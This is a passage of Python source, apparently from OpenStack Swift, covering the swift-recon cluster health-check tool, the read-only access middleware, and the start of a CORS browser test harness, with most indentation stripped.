print("Invalid: %s is %s" % (host, errors[host]))
print("=" * 79)
def expirer_check(self, hosts):
"""
Obtain and print expirer statistics
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
stats = {'object_expiration_pass': [], 'expired_last_pass': []}
recon = Scout("expirer/%s" % self.server_type, self.verbose,
self.suppress_errors, self.timeout)
print("[%s] Checking on expirers" % self._ptime())
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
stats['object_expiration_pass'].append(
response.get('object_expiration_pass'))
stats['expired_last_pass'].append(
response.get('expired_last_pass'))
for k in stats:
if stats[k]:
computed = self._gen_stats(stats[k], name=k)
if computed['reported'] > 0:
self._print_stats(computed)
else:
print("[%s] - No hosts returned valid data." % k)
else:
print("[%s] - No hosts returned valid data." % k)
print("=" * 79)
def _calculate_least_and_most_recent(self, url_time_data):
"""calulate and print the least and most recent urls
Given a list of url and time tuples calulate the most and least
recent timings and print it out.
:param url_time_data: list of url and time tuples: [(url, time_), ..]
"""
least_recent_time = 9999999999
least_recent_url = None
most_recent_time = 0
most_recent_url = None
for url, last in url_time_data:
if last is None:
continue
if last < least_recent_time:
least_recent_time = last
least_recent_url = url
if last > most_recent_time:
most_recent_time = last
most_recent_url = url
if least_recent_url is not None:
host = urlparse(least_recent_url).netloc
if not least_recent_time:
print('Oldest completion was NEVER by %s.' % host)
else:
elapsed = time.time() - least_recent_time
elapsed, elapsed_unit = seconds2timeunit(elapsed)
print('Oldest completion was %s (%d %s ago) by %s.' % (
self._ptime(least_recent_time),
elapsed, elapsed_unit, host))
if most_recent_url is not None:
host = urlparse(most_recent_url).netloc
elapsed = time.time() - most_recent_time
elapsed, elapsed_unit = seconds2timeunit(elapsed)
print('Most recent completion was %s (%d %s ago) by %s.' % (
self._ptime(most_recent_time),
elapsed, elapsed_unit, host))
def reconstruction_check(self, hosts):
"""
Obtain and print reconstruction statistics
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6020), ('127.0.0.2', 6030)])
"""
stats = []
last_stats = []
recon = Scout("reconstruction/%s" % self.server_type, self.verbose,
self.suppress_errors, self.timeout)
print("[%s] Checking on reconstructors" % self._ptime())
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
stats.append(response.get('object_reconstruction_time'))
last = response.get('object_reconstruction_last', 0)
last_stats.append((url, last))
if stats:
computed = self._gen_stats(stats,
name='object_reconstruction_time')
if computed['reported'] > 0:
self._print_stats(computed)
else:
print("[object_reconstruction_time] - No hosts returned "
"valid data.")
else:
print("[object_reconstruction_time] - No hosts returned "
"valid data.")
self._calculate_least_and_most_recent(last_stats)
print("=" * 79)
def replication_check(self, hosts):
"""
Obtain and print replication statistics
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
stats = {'replication_time': [], 'failure': [], 'success': [],
'attempted': []}
last_stats = []
recon = Scout("replication/%s" % self.server_type, self.verbose,
self.suppress_errors, self.timeout)
print("[%s] Checking on replication" % self._ptime())
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
stats['replication_time'].append(
response.get('replication_time',
response.get('object_replication_time', 0)))
repl_stats = response.get('replication_stats')
if repl_stats:
for stat_key in ['attempted', 'failure', 'success']:
stats[stat_key].append(repl_stats.get(stat_key))
last = response.get('replication_last',
response.get('object_replication_last', 0))
last_stats.append((url, last))
for k in stats:
if stats[k]:
if k != 'replication_time':
computed = self._gen_stats(stats[k],
name='replication_%s' % k)
else:
computed = self._gen_stats(stats[k], name=k)
if computed['reported'] > 0:
self._print_stats(computed)
else:
print("[%s] - No hosts returned valid data." % k)
else:
print("[%s] - No hosts returned valid data." % k)
self._calculate_least_and_most_recent(last_stats)
print("=" * 79)
def updater_check(self, hosts):
"""
Obtain and print updater statistics
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
stats = []
recon = Scout("updater/%s" % self.server_type, self.verbose,
self.suppress_errors, self.timeout)
print("[%s] Checking updater times" % self._ptime())
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
if response['%s_updater_sweep' % self.server_type]:
stats.append(response['%s_updater_sweep' %
self.server_type])
if len(stats) > 0:
computed = self._gen_stats(stats, name='updater_last_sweep')
if computed['reported'] > 0:
self._print_stats(computed)
else:
print("[updater_last_sweep] - No hosts returned valid data.")
else:
print("[updater_last_sweep] - No hosts returned valid data.")
print("=" * 79)
def auditor_check(self, hosts):
"""
Obtain and print obj auditor statistics
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
scan = {}
adone = '%s_auditor_pass_completed' % self.server_type
afail = '%s_audits_failed' % self.server_type
apass = '%s_audits_passed' % self.server_type
asince = '%s_audits_since' % self.server_type
recon = Scout("auditor/%s" % self.server_type, self.verbose,
self.suppress_errors, self.timeout)
print("[%s] Checking auditor stats" % self._ptime())
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
scan[url] = response
if len(scan) < 1:
print("Error: No hosts available")
return
stats = {}
stats[adone] = [scan[i][adone] for i in scan
if scan[i][adone] is not None]
stats[afail] = [scan[i][afail] for i in scan
if scan[i][afail] is not None]
stats[apass] = [scan[i][apass] for i in scan
if scan[i][apass] is not None]
stats[asince] = [scan[i][asince] for i in scan
if scan[i][asince] is not None]
for k in stats:
if len(stats[k]) < 1:
print("[%s] - No hosts returned valid data." % k)
else:
if k != asince:
computed = self._gen_stats(stats[k], k)
if computed['reported'] > 0:
self._print_stats(computed)
if len(stats[asince]) >= 1:
low = min(stats[asince])
high = max(stats[asince])
total = sum(stats[asince])
average = total / len(stats[asince])
print('[last_pass] oldest: %s, newest: %s, avg: %s' %
(self._ptime(low), self._ptime(high), self._ptime(average)))
print("=" * 79)
def nested_get_value(self, key, recon_entry):
"""
Generator that yields all values for given key in a recon cache entry.
This is for use with object auditor recon cache entries. If the
object auditor has run in parallel, the recon cache will have entries
of the form: {'object_auditor_stats_ALL': { 'disk1': {..},
'disk2': {..},
'disk3': {..},
...}}
If the object auditor hasn't run in parallel, the recon cache will have
entries of the form: {'object_auditor_stats_ALL': {...}}.
The ZBF auditor doesn't run in parallel. However, if a subset of
devices is selected for auditing, the recon cache will have an entry
of the form: {'object_auditor_stats_ZBF': {'disk1disk2..diskN': {}}}
We use this generator to find all instances of a particular key in
these multi-level dictionaries.
"""
for k, v in recon_entry.items():
if isinstance(v, dict):
for value in self.nested_get_value(key, v):
yield value
if k == key:
yield v
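# e.g. for entry = {'object_auditor_stats_ALL':
#                   {'disk1': {'errors': 1}, 'disk2': {'errors': 2}}},
# list(self.nested_get_value('errors', entry)) yields [1, 2]; the same
# call also works when the stats dict has no per-disk nesting.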
def object_auditor_check(self, hosts):
"""
Obtain and print obj auditor statistics
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
all_scan = {}
zbf_scan = {}
atime = 'audit_time'
bprocessed = 'bytes_processed'
passes = 'passes'
errors = 'errors'
quarantined = 'quarantined'
recon = Scout("auditor/object", self.verbose, self.suppress_errors,
self.timeout)
print("[%s] Checking auditor stats " % self._ptime())
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
if response['object_auditor_stats_ALL']:
all_scan[url] = response['object_auditor_stats_ALL']
if response['object_auditor_stats_ZBF']:
zbf_scan[url] = response['object_auditor_stats_ZBF']
if len(all_scan) > 0:
stats = {}
stats[atime] = [sum(self.nested_get_value(atime, all_scan[i]))
for i in all_scan]
stats[bprocessed] = [sum(self.nested_get_value(bprocessed,
all_scan[i])) for i in all_scan]
stats[passes] = [sum(self.nested_get_value(passes, all_scan[i]))
for i in all_scan]
stats[errors] = [sum(self.nested_get_value(errors, all_scan[i]))
for i in all_scan]
stats[quarantined] = [sum(self.nested_get_value(quarantined,
all_scan[i])) for i in all_scan]
for k in stats:
if None in stats[k]:
stats[k] = [x for x in stats[k] if x is not None]
if len(stats[k]) < 1:
print("[Auditor %s] - No hosts returned valid data." % k)
else:
computed = self._gen_stats(stats[k],
name='ALL_%s_last_path' % k)
if computed['reported'] > 0:
self._print_stats(computed)
else:
print("[ALL_auditor] - No hosts returned valid data.")
else:
print("[ALL_auditor] - No hosts returned valid data.")
if len(zbf_scan) > 0:
stats = {}
stats[atime] = [sum(self.nested_get_value(atime, zbf_scan[i]))
for i in zbf_scan]
stats[bprocessed] = [sum(self.nested_get_value(bprocessed,
zbf_scan[i])) for i in zbf_scan]
stats[errors] = [sum(self.nested_get_value(errors, zbf_scan[i]))
for i in zbf_scan]
stats[quarantined] = [sum(self.nested_get_value(quarantined,
zbf_scan[i])) for i in zbf_scan]
for k in stats:
if None in stats[k]:
stats[k] = [x for x in stats[k] if x is not None]
if len(stats[k]) < 1:
print("[Auditor %s] - No hosts returned valid data." % k)
else:
computed = self._gen_stats(stats[k],
name='ZBF_%s_last_path' % k)
if computed['reported'] > 0:
self._print_stats(computed)
else:
print("[ZBF_auditor] - No hosts returned valid data.")
else:
print("[ZBF_auditor] - No hosts returned valid data.")
print("=" * 79)
def sharding_check(self, hosts):
"""
Obtain and print sharding statistics
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6221), ('127.0.0.2', 6231)])
"""
stats = {'sharding_time': [],
'attempted': [], 'failure': [], 'success': []}
recon = Scout("sharding", self.verbose,
self.suppress_errors, self.timeout)
print("[%s] Checking on sharders" % self._ptime())
least_recent_time = 9999999999
least_recent_url = None
most_recent_time = 0
most_recent_url = None
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
stats['sharding_time'].append(response.get('sharding_time', 0))
shard_stats = response.get('sharding_stats')
if shard_stats:
# Sharding has a ton more stats, like "no_change".
# Not sure if we need them at all, or maybe for -v.
for stat_key in ['attempted', 'failure', 'success']:
stats[stat_key].append(shard_stats.get(stat_key))
last = response.get('sharding_last', 0)
if last is None:
continue
if last < least_recent_time:
least_recent_time = last
least_recent_url = url
if last > most_recent_time:
most_recent_time = last
most_recent_url = url
for k in stats:
if stats[k]:
computed = self._gen_stats(stats[k], name=k)
if computed['reported'] > 0:
self._print_stats(computed)
else:
print("[%s] - No hosts returned valid data." % k)
else:
print("[%s] - No hosts returned valid data." % k)
if least_recent_url is not None:
host = urlparse(least_recent_url).netloc
if not least_recent_time:
print('Oldest completion was NEVER by %s.' % host)
else:
elapsed = time.time() - least_recent_time
elapsed, elapsed_unit = seconds2timeunit(elapsed)
print('Oldest completion was %s (%d %s ago) by %s.' % (
self._ptime(least_recent_time),
elapsed, elapsed_unit, host))
if most_recent_url is not None:
host = urlparse(most_recent_url).netloc
elapsed = time.time() - most_recent_time
elapsed, elapsed_unit = seconds2timeunit(elapsed)
print('Most recent completion was %s (%d %s ago) by %s.' % (
self._ptime(most_recent_time),
elapsed, elapsed_unit, host))
print("=" * 79)
def load_check(self, hosts):
"""
Obtain and print load average statistics
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
load1 = {}
load5 = {}
load15 = {}
recon = Scout("load", self.verbose, self.suppress_errors,
self.timeout)
print("[%s] Checking load averages" % self._ptime())
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
load1[url] = response['1m']
load5[url] = response['5m']
load15[url] = response['15m']
stats = {"1m": load1, "5m": load5, "15m": load15}
for item in stats:
if len(stats[item]) > 0:
computed = self._gen_stats(stats[item].values(),
name='%s_load_avg' % item)
self._print_stats(computed)
else:
print("[%s_load_avg] - No hosts returned valid data." % item)
print("=" * 79)
def quarantine_check(self, hosts):
"""
Obtain and print quarantine statistics
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
objq = {}
conq = {}
acctq = {}
stats = {}
recon = Scout("quarantined", self.verbose, self.suppress_errors,
self.timeout)
print("[%s] Checking quarantine" % self._ptime())
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
objq[url] = response['objects']
conq[url] = response['containers']
acctq[url] = response['accounts']
for key in response.get('policies', {}):
pkey = "objects_%s" % key
stats.setdefault(pkey, {})
stats[pkey][url] = response['policies'][key]['objects']
stats.update({"objects": objq, "containers": conq, "accounts": acctq})
for item in stats:
if len(stats[item]) > 0:
computed = self._gen_stats(stats[item].values(),
name='quarantined_%s' % item)
self._print_stats(computed)
else:
print("No hosts returned valid data.")
print("=" * 79)
def socket_usage(self, hosts):
"""
Obtain and print /proc/net/sockstat statistics
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
inuse4 = {}
mem = {}
inuse6 = {}
timewait = {}
orphan = {}
recon = Scout("sockstat", self.verbose, self.suppress_errors,
self.timeout)
print("[%s] Checking socket usage" % self._ptime())
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
inuse4[url] = response['tcp_in_use']
mem[url] = response['tcp_mem_allocated_bytes']
inuse6[url] = response.get('tcp6_in_use', 0)
timewait[url] = response['time_wait']
orphan[url] = response['orphan']
stats = {"tcp_in_use": inuse4, "tcp_mem_allocated_bytes": mem,
"tcp6_in_use": inuse6, "time_wait": timewait,
"orphan": orphan}
for item in stats:
if len(stats[item]) > 0:
computed = self._gen_stats(stats[item].values(), item)
self._print_stats(computed)
else:
print("No hosts returned valid data.")
print("=" * 79)
def disk_usage(self, hosts, top=0, lowest=0, human_readable=False):
"""
Obtain and print disk usage statistics
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
stats = {}
highs = []
lows = []
raw_total_used = []
raw_total_avail = []
percents = {}
top_percents = [(None, 0)] * top
low_percents = [(None, 100)] * lowest
recon = Scout("diskusage", self.verbose, self.suppress_errors,
self.timeout)
# We want to only query each host once, but we don't care
# which of the available ports we use. So we filter hosts by
# constructing a host->port dictionary, since the dict
# constructor ensures each key is unique, thus each host
# appears only once in filtered_hosts.
filtered_hosts = set(dict(hosts).items())
print("[%s] Checking disk usage now" % self._ptime())
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, filtered_hosts):
if status == 200:
hostusage = []
for entry in response:
if not isinstance(entry['mounted'], bool):
print("-> %s/%s: Error: %s" % (url, entry['device'],
entry['mounted']))
elif entry['mounted']:
used = float(entry['used']) / float(entry['size']) \
* 100.0
raw_total_used.append(entry['used'])
raw_total_avail.append(entry['avail'])
hostusage.append(round(used, 2))
for ident, oused in top_percents:
if oused < used:
top_percents.append(
(url + ' ' + entry['device'], used))
top_percents.sort(key=lambda x: -x[1])
top_percents.pop()
break
for ident, oused in low_percents:
if oused > used:
low_percents.append(
(url + ' ' + entry['device'], used))
low_percents.sort(key=lambda x: x[1])
low_percents.pop()
break
stats[url] = hostusage
for url in stats:
if len(stats[url]) > 0:
# get per host hi/los for another day
low = min(stats[url])
high = max(stats[url])
highs.append(high)
lows.append(low)
for percent in stats[url]:
percents[int(percent)] = percents.get(int(percent), 0) + 1
else:
print("-> %s: Error. No drive info available." % url)
if len(lows) > 0:
low = min(lows)
high = max(highs)
# dist graph shamelessly stolen from https://github.com/gholt/tcod
print("Distribution Graph:")
mul = 69.0 / max(percents.values())
for percent in sorted(percents):
print('% 3d%%%5d %s' % (percent, percents[percent],
'*' * int(percents[percent] * mul)))
raw_used = sum(raw_total_used)
raw_avail = sum(raw_total_avail)
raw_total = raw_used + raw_avail
avg_used = 100.0 * raw_used / raw_total
if human_readable:
raw_used = size_suffix(raw_used)
raw_avail = size_suffix(raw_avail)
raw_total = size_suffix(raw_total)
print("Disk usage: space used: %s of %s" % (raw_used, raw_total))
print("Disk usage: space free: %s of %s" % (raw_avail, raw_total))
print("Disk usage: lowest: %s%%, highest: %s%%, avg: %s%%" %
(low, high, avg_used))
else:
print("No hosts returned valid data.")
print("=" * 79)
if top_percents:
print('TOP %s' % top)
for ident, used in top_percents:
if ident:
url, device = ident.split()
host = urlparse(url).netloc.split(':')[0]
print('%.02f%% %s' % (used, '%-15s %s' % (host, device)))
if low_percents:
print('LOWEST %s' % lowest)
for ident, used in low_percents:
if ident:
url, device = ident.split()
host = urlparse(url).netloc.split(':')[0]
print('%.02f%% %s' % (used, '%-15s %s' % (host, device)))
def time_check(self, hosts, jitter=0.0):
"""
Check a time synchronization of hosts with current time
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
:param jitter: Maximal allowed time jitter
"""
jitter = abs(jitter)
matches = 0
errors = 0
recon = Scout("time", self.verbose, self.suppress_errors,
self.timeout)
print("[%s] Checking time-sync" % self._ptime())
for url, ts_remote, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status != 200:
errors = errors + 1
continue
if (ts_remote + jitter < ts_start or ts_remote - jitter > ts_end):
diff = abs(ts_end - ts_remote)
ts_end_f = self._ptime(ts_end)
ts_remote_f = self._ptime(ts_remote)
print("!! %s current time is %s, but remote is %s, "
"differs by %.4f sec" % (
url,
ts_end_f,
ts_remote_f,
diff))
continue
matches += 1
if self.verbose:
print("-> %s matches." % url)
print("%s/%s hosts matched, %s error[s] while checking hosts." % (
matches, len(hosts), errors))
print("=" * 79)
def version_check(self, hosts):
"""
Check OS Swift version of hosts. Inform if differs.
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
versions = set()
errors = 0
print("[%s] Checking versions" % self._ptime())
recon = Scout("version", self.verbose, self.suppress_errors,
self.timeout)
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status != 200:
errors = errors + 1
continue
versions.add(response['version'])
if self.verbose:
print("-> %s installed version %s" % (
url, response['version']))
if not len(versions):
print("No hosts returned valid data.")
elif len(versions) == 1:
print("Versions matched (%s), "
"%s error[s] while checking hosts." % (
versions.pop(), errors))
else:
print("Versions not matched (%s), "
"%s error[s] while checking hosts." % (
", ".join(sorted(versions)), errors))
print("=" * 79)
def _get_ring_names(self, policy=None):
"""
Retrieve name of ring files.
If no policy is passed and the server type is object,
the ring names of all storage-policies are retrieved.
:param policy: name or index of storage policy, only applicable
with server_type==object.
:returns: list of ring names.
"""
if self.server_type == 'object':
ring_names = [p.ring_name for p in POLICIES if (
p.name == policy or not policy or (
policy.isdigit() and int(policy) == int(p) or
(isinstance(policy, string_types)
and policy in p.aliases)))]
else:
ring_names = [self.server_type]
return ring_names
def main(self):
"""
Retrieve and report cluster info from hosts running recon middleware.
"""
print("=" * 79)
usage = '''
usage: %prog <server_type> [<server_type> [<server_type>]]
[-v] [--suppress] [-a] [-r] [-u] [-d] [-R]
[-l] [-T] [--md5] [--auditor] [--updater] [--expirer] [--sockstat]
[--human-readable]
<server_type>\taccount|container|object
Defaults to object server.
ex: %prog container -l --auditor
'''
args = optparse.OptionParser(usage)
args.add_option('--verbose', '-v', action="store_true",
help="Print verbose info")
args.add_option('--suppress', action="store_true",
help="Suppress most connection related errors")
args.add_option('--async', '-a',
action="store_true", dest="async_check",
help="Get async stats")
args.add_option('--replication', '-r', action="store_true",
help="Get replication stats")
args.add_option('--reconstruction', '-R', action="store_true",
help="Get reconstruction stats")
args.add_option('--auditor', action="store_true",
help="Get auditor stats")
args.add_option('--updater', action="store_true",
help="Get updater stats")
args.add_option('--expirer', action="store_true",
help="Get expirer stats")
args.add_option('--sharding', action="store_true",
help="Get sharding stats")
args.add_option('--unmounted', '-u', action="store_true",
help="Check cluster for unmounted devices")
args.add_option('--diskusage', '-d', action="store_true",
help="Get disk usage stats")
args.add_option('--human-readable', action="store_true",
help="Use human readable suffix for disk usage stats")
args.add_option('--loadstats', '-l', action="store_true",
help="Get cluster load average stats")
args.add_option('--quarantined', '-q', action="store_true",
help="Get cluster quarantine stats")
args.add_option('--validate-servers', action="store_true",
help="Validate servers on the ring")
args.add_option('--md5', action="store_true",
help="Get md5sum of servers ring and compare to "
"local copy")
args.add_option('--sockstat', action="store_true",
help="Get cluster socket usage stats")
args.add_option('--driveaudit', action="store_true",
help="Get drive audit error stats")
args.add_option('--time', '-T', action="store_true",
help="Check time synchronization")
args.add_option('--jitter', type="float", default=0.0,
help="Maximal allowed time jitter")
args.add_option('--swift-versions', action="store_true",
help="Check swift versions")
args.add_option('--top', type='int', metavar='COUNT', default=0,
help='Also show the top COUNT entries in rank order.')
args.add_option('--lowest', type='int', metavar='COUNT', default=0,
                        help='Also show the lowest COUNT entries in rank '
                             'order.')
args.add_option('--all', action="store_true",
help="Perform all checks. Equal to \t\t\t-arRudlqT "
"--md5 --sockstat --auditor --updater --expirer "
"--driveaudit --validate-servers --swift-versions")
args.add_option('--region', type="int",
help="Only query servers in specified region")
args.add_option('--zone', '-z', type="int",
help="Only query servers in specified zone")
args.add_option('--timeout', '-t', type="int", metavar="SECONDS",
help="Time to wait for a response from a server",
default=5)
args.add_option('--swiftdir', default="/etc/swift",
help="Default = /etc/swift")
args.add_option('--policy', '-p',
help='Only query object servers in specified '
'storage policy (specified as name or index).')
options, arguments = args.parse_args()
if len(sys.argv) <= 1 or len(arguments) > len(self.check_types):
args.print_help()
sys.exit(0)
if arguments:
arguments = set(arguments)
if arguments.issubset(self.check_types):
server_types = arguments
else:
print("Invalid Server Type")
args.print_help()
sys.exit(1)
else: # default
server_types = ['object']
swift_dir = options.swiftdir
if set_swift_dir(swift_dir):
reload_storage_policies()
self.verbose = options.verbose
self.suppress_errors = options.suppress
self.timeout = options.timeout
for server_type in server_types:
self.server_type = server_type
ring_names = self._get_ring_names(options.policy)
if not ring_names:
print('Invalid Storage Policy: %s' % options.policy)
args.print_help()
sys.exit(0)
hosts = self.get_hosts(options.region, options.zone,
swift_dir, ring_names)
print("--> Starting reconnaissance on %s hosts (%s)" %
(len(hosts), self.server_type))
print("=" * 79)
if options.all:
if self.server_type == 'object':
self.async_check(hosts)
self.object_auditor_check(hosts)
self.updater_check(hosts)
self.expirer_check(hosts)
self.reconstruction_check(hosts)
elif self.server_type == 'container':
self.auditor_check(hosts)
self.updater_check(hosts)
self.sharding_check(hosts)
elif self.server_type == 'account':
self.auditor_check(hosts)
self.replication_check(hosts)
self.umount_check(hosts)
self.load_check(hosts)
self.disk_usage(hosts, options.top, options.lowest,
options.human_readable)
self.get_ringmd5(hosts, swift_dir)
self.get_swiftconfmd5(hosts)
self.quarantine_check(hosts)
self.socket_usage(hosts)
self.server_type_check(hosts)
self.driveaudit_check(hosts)
self.time_check(hosts, options.jitter)
self.version_check(hosts)
else:
if options.async_check:
if self.server_type == 'object':
self.async_check(hosts)
else:
print("Error: Can't check asyncs on non object "
"servers.")
print("=" * 79)
if options.unmounted:
self.umount_check(hosts)
if options.replication:
self.replication_check(hosts)
if options.auditor:
if self.server_type == 'object':
self.object_auditor_check(hosts)
else:
self.auditor_check(hosts)
if options.updater:
if self.server_type == 'account':
print("Error: Can't check updaters on account "
"servers.")
print("=" * 79)
else:
self.updater_check(hosts)
if options.expirer:
if self.server_type == 'object':
self.expirer_check(hosts)
else:
print("Error: Can't check expirer on non object "
"servers.")
print("=" * 79)
if options.sharding:
if self.server_type == 'container':
self.sharding_check(hosts)
else:
print("Error: Can't check sharding on non container "
"servers.")
print("=" * 79)
if options.reconstruction:
if self.server_type == 'object':
self.reconstruction_check(hosts)
else:
print("Error: Can't check reconstruction stats on "
"non object servers.")
print("=" * 79)
if options.validate_servers:
self.server_type_check(hosts)
if options.loadstats:
self.load_check(hosts)
if options.diskusage:
self.disk_usage(hosts, options.top, options.lowest,
options.human_readable)
if options.md5:
self.get_ringmd5(hosts, swift_dir)
self.get_swiftconfmd5(hosts)
if options.quarantined:
self.quarantine_check(hosts)
if options.sockstat:
self.socket_usage(hosts)
if options.driveaudit:
self.driveaudit_check(hosts)
if options.time:
self.time_check(hosts, options.jitter)
if options.swift_versions:
self.version_check(hosts)
def main():
try:
reconnoiter = SwiftRecon()
reconnoiter.main()
except KeyboardInterrupt:
print('\n')
```
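The `nested_get_value` generator above is what lets `object_auditor_check` cope with both the flat and the per-disk recon cache layouts described in its docstring. A standalone sketch of the same traversal (reimplemented as a free function so it runs outside `SwiftRecon`; the cache entries are made up for illustration):
```python
# Standalone sketch of the nested_get_value traversal used by SwiftRecon.
def nested_get_value(key, recon_entry):
    """Yield every value stored under ``key`` at any nesting depth."""
    for k, v in recon_entry.items():
        if isinstance(v, dict):
            for value in nested_get_value(key, v):
                yield value
        if k == key:
            yield v

# Parallel object auditor: one sub-dict per disk.
parallel_entry = {'disk1': {'passes': 10, 'errors': 0},
                  'disk2': {'passes': 7, 'errors': 1}}
# Non-parallel run: stats sit at the top level.
flat_entry = {'passes': 42, 'errors': 2}

print(sum(nested_get_value('passes', parallel_entry)))  # 17
print(sum(nested_get_value('passes', flat_entry)))      # 42
```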
#### File: common/middleware/read_only.py
```python
from swift.common.constraints import check_account_format, valid_api_version
from swift.common.swob import HTTPMethodNotAllowed, Request
from swift.common.utils import get_logger, config_true_value
from swift.common.registry import register_swift_info
from swift.proxy.controllers.base import get_info
"""
=========
Read Only
=========
The ability to make an entire cluster or individual accounts read only is
implemented as pluggable middleware. When a cluster or an account is in read
only mode, requests that would result in writes to the cluster are not allowed.
A 405 is returned on such requests. "COPY", "DELETE", "POST", and
"PUT" are the HTTP methods that are considered writes.
-------------
Configuration
-------------
All configuration is optional.
============= ======= ====================================================
Option Default Description
------------- ------- ----------------------------------------------------
read_only false Set to 'true' to put the entire cluster in read only
mode.
allow_deletes false Set to 'true' to allow deletes.
============= ======= ====================================================
---------------------------
Marking Individual Accounts
---------------------------
If a system administrator wants to mark individual accounts as read only,
he/she can set X-Account-Sysmeta-Read-Only on an account to 'true'.
If a system administrator wants to allow writes to individual accounts,
when a cluster is in read only mode, he/she can set
X-Account-Sysmeta-Read-Only on an account to 'false'.
This header will be hidden from the user, because of the gatekeeper middleware,
and can only be set using a direct client to the account nodes.
"""
class ReadOnlyMiddleware(object):
"""
    Middleware that makes an entire cluster or individual accounts read only.
"""
def __init__(self, app, conf, logger=None):
self.app = app
self.logger = logger or get_logger(conf, log_route='read_only')
self.read_only = config_true_value(conf.get('read_only'))
self.write_methods = {'COPY', 'POST', 'PUT'}
if not config_true_value(conf.get('allow_deletes')):
self.write_methods.add('DELETE')
def __call__(self, env, start_response):
req = Request(env)
if req.method not in self.write_methods:
return self.app(env, start_response)
try:
version, account, container, obj = req.split_path(2, 4, True)
if not valid_api_version(version):
raise ValueError
except ValueError:
return self.app(env, start_response)
if req.method == 'COPY' and 'Destination-Account' in req.headers:
dest_account = req.headers.get('Destination-Account')
account = check_account_format(req, dest_account)
if self.account_read_only(req, account):
msg = 'Writes are disabled for this account.'
return HTTPMethodNotAllowed(body=msg)(env, start_response)
return self.app(env, start_response)
def account_read_only(self, req, account):
"""
Check whether an account should be read-only.
This considers both the cluster-wide config value as well as the
per-account override in X-Account-Sysmeta-Read-Only.
"""
info = get_info(self.app, req.environ, account, swift_source='RO')
read_only = info.get('sysmeta', {}).get('read-only', '')
if not read_only:
return self.read_only
return config_true_value(read_only)
def filter_factory(global_conf, **local_conf):
"""
    paste.deploy filter factory for creating read-only middleware.
"""
conf = global_conf.copy()
conf.update(local_conf)
if config_true_value(conf.get('read_only')):
register_swift_info('read_only')
def read_only_filter(app):
return ReadOnlyMiddleware(app, conf)
return read_only_filter
```
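To see the middleware's decision path end to end, here is a minimal sketch that wraps a toy WSGI app and stubs out `get_info` the same way the unit tests later in this document do; it assumes a Swift source tree is importable and is not a deployment recipe:
```python
# Hedged usage sketch for ReadOnlyMiddleware; get_info is stubbed out so
# no backend account server is needed.
import mock
from swift.common.middleware.read_only import filter_factory
from swift.common.swob import Request

def toy_app(env, start_response):
    start_response('200 OK', [])
    return [b'ok']

ro = filter_factory({'read_only': 'true'})(toy_app)

with mock.patch('swift.common.middleware.read_only.get_info',
                return_value={}):
    req = Request.blank('/v1/AUTH_test/c/o',
                        environ={'REQUEST_METHOD': 'PUT'})
    # With read_only=true and no per-account override, writes get a 405.
    print(req.get_response(ro).status)  # 405 Method Not Allowed
```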
#### File: test/cors/main.py
```python
import argparse
import json
import os
import os.path
import sys
import threading
import time
import traceback
from six.moves import urllib
from six.moves import socketserver
from six.moves import SimpleHTTPServer
try:
import selenium.webdriver
except ImportError:
selenium = None
import swiftclient.client
DEFAULT_ENV = {
'OS_AUTH_URL': os.environ.get('ST_AUTH',
'http://localhost:8080/auth/v1.0'),
'OS_USERNAME': os.environ.get('ST_USER', 'test:tester'),
'OS_PASSWORD': os.environ.get('ST_KEY', 'testing'),
'OS_STORAGE_URL': None,
'S3_ENDPOINT': 'http://localhost:8080',
'S3_USER': 'test:tester',
'S3_KEY': 'testing',
}
ENV = {key: os.environ.get(key, default)
for key, default in DEFAULT_ENV.items()}
TEST_TIMEOUT = 120.0 # seconds
STEPS = 500
# Hack up stdlib so SimpleHTTPRequestHandler works well on py2, too
this_dir = os.path.realpath(os.path.dirname(__file__))
os.getcwd = lambda: this_dir
class CORSSiteHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def log_message(self, fmt, *args):
pass # quiet, you!
class CORSSiteServer(socketserver.TCPServer):
allow_reuse_address = True
class CORSSite(threading.Thread):
def __init__(self, bind_port=8000):
super(CORSSite, self).__init__()
self.server = None
self.bind_port = bind_port
def run(self):
self.server = CORSSiteServer(
('0.0.0.0', self.bind_port),
CORSSiteHandler)
self.server.serve_forever()
def terminate(self):
if self.server is not None:
self.server.shutdown()
self.join()
class Zeroes(object):
BUF = b'\x00' * 64 * 1024
def __init__(self, size=0):
self.pos = 0
self.size = size
